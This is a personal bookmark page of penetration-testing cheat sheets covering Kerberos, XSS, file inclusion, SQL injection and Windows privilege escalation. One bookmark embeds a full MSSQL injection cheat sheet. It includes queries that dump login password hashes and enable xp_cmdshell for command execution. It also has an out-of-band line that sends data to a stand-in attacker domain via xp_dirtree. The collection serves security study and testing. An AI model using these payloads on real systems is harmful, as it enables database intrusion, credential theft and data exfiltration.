776 links
  • Shared Bookmarks
  • Home
  • Login
  • RSS Feed
  • ATOM Feed
  • Tag cloud
  • Picture wall
  • Daily
Links per page: 20 50 100
page 2 / 2
Newer►
30 results tagged cheatsheet x
  • thumbnail
    A cheatsheet with commands that can be used to perform kerberos attacks · GitHub
    October 22, 2019 at 3:07:18 PM UTC - permalink -
    QRCode
    - https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
    kerberos ad active directory cheatsheet hacking pentest ptt ptk pass ticket hash hashes tickets
  • thumbnail
    vulnerability-lab.com/resources/documents/531.txt

    Ultimate XSS cheatsheet

    October 17, 2019 at 3:18:54 PM UTC - permalink -
    QRCode
    - https://www.vulnerability-lab.com/resources/documents/531.txt
    cheatsheet xss payloads hacking pentest
  • thumbnail
    Local File Inclusion · Security - My notepad
    June 16, 2019 at 9:48:14 PM UTC - permalink -
    QRCode
    - https://xapax.gitbooks.io/security/content/local_file_inclusion.html
    lfi cheatsheet
  • thumbnail
    41397-injecting-sqlite-database-based-applications.pdf
    May 13, 2019 at 9:27:09 AM UTC - permalink -
    QRCode
    - https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf
    sqlinjection sql injection payload hacking pentest cheatsheet sqlite
  • thumbnail
    The SQL Injection Knowledge Base
    May 7, 2019 at 10:49:29 AM UTC - permalink -
    QRCode
    - https://websec.ca/kb/sql_injection
    sql injection cheatsheet hacking pentest
  • thumbnail
    MSSQL Injection Cheat Sheet | pentestmonkey
    March 28, 2019 at 1:38:44 PM UTC - permalink -
    QRCode
    - http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
    cheatsheet mssql sql injection enumeration enum post exploitation privilege escalation hacking pentest windows
  • thumbnail
    SQL Injection Cheat Sheet: MSSQL — GracefulSecurity 
    Version
SELECT @@version;
SELECT @@VERSION LIKE '%2008%';

User details
SELECT user;
SELECT current_user;
SELECT SYSTEM_USER;
SELECT USER_NAME();
SELECT USER_NAME(2);
SELECT SUSER_SNAME();
SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;
SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);

Database details
SELECT DB_NAME();
SELECT DB_NAME(5);
SELECT name FROM master..sysdatabases;

Database credentials
SELECT name %2b ':'  %2b master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins;

Server details
SELECT @@servername; SELECT host_name(); SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel');

Table Names
SELECT name FROM master..sysobjects WHERE xtype='U';
SELECT table_name FROM information_schema.tables;

Columns Names
SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = 'tablename';
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';

No Quotes
SELECT * FROM Users WHERE username = CHAR(97) + CHAR(98) + CHAR(99);
ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) = 97;
ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) < 128;

String Concatenation
SELECT CONCAT('a','a','a');
SELECT 'a' %2b 'b' %2b 'c' %2b 'd';

Conditionals
IF 1=1 SELECT 'true' ELSE SELECT 'false';
SELECT CASE WHEN 1=1 THEN true ELSE false END;

Time-delay
WAITFOR DELAY 'time_to_pass';
WAITFOR TIME 'time_to_execute';

Enable Command Execution
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure reconfigure;
EXEC sp_configure 'xp_cmdshell', 1;
EXEC sp_configure reconfigure;

Command Execution
EXEC master.dbo.xp_cmdshell 'cmd';

Enable Alternative Command Execution
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure reconfigure;
EXEC sp_configure 'OLE Automation Procedures', 1;
EXEC sp_configure reconfigure;

Alternative Command Execution
DECLARE @execmd INT;
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT;
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%system32cmd.exe /c';

"RunAs"
SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'password', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"');
EXECUTE AS USER = 'FooUser';

Read Files
BULK INSERT dbo.temp FROM 'c:\foobar.txt' WITH ( ROWTERMINATOR='n' );

Out-of-Band Retrieval
;declare @q varchar(200);set @q='\attacker.controlledserver'+(SELECT SUBSTRING(@@version,1,9))+'.malicious.com/foo'; exec master.dbo.xp_dirtree @q; --  

Substrings
SUBSTRING(table_name,1,1) FROM information_schema.tables = 'A';
ASCII(SUBSTRING(table_name,1,1)) FROM information_schema.tables > 96;

Retrieve Nth Line
SELECT TOP 1 table_name FROM information_schema.tables;
SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables);
    March 28, 2019 at 1:36:53 PM UTC - permalink -
    QRCode
    - https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/
    xp_cmdshell windows cheatsheet exploitation post postexploitation mssql sql injection enumeration enum hacking pentest
  • FuzzySecurity | Windows Privilege Escalation Fundamentals
    March 7, 2019 at 7:16:45 PM UTC * - permalink -
    QRCode
    - https://www.fuzzysecurity.com/tutorials/16.html
    windows hacking post exploitation postex privesc privilege escalation fuzzy cheatsheet
  • thumbnail
    SQL Injection Cheat Sheet | Netsparker
    March 6, 2019 at 12:48:20 PM UTC - permalink -
    QRCode
    - https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
    netsparker sql injection cheatsheet hacking pentest
  • thumbnail
    ASafety » MSSQL Injection Cheat Sheet
    December 26, 2018 at 11:28:46 PM UTC - permalink -
    QRCode
    - https://www.asafety.fr/mssql-injection-cheat-sheet/
    cheatsheet mssql injection sql hacking
Links per page: 20 50 100
page 2 / 2
Newer►
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Help/documentation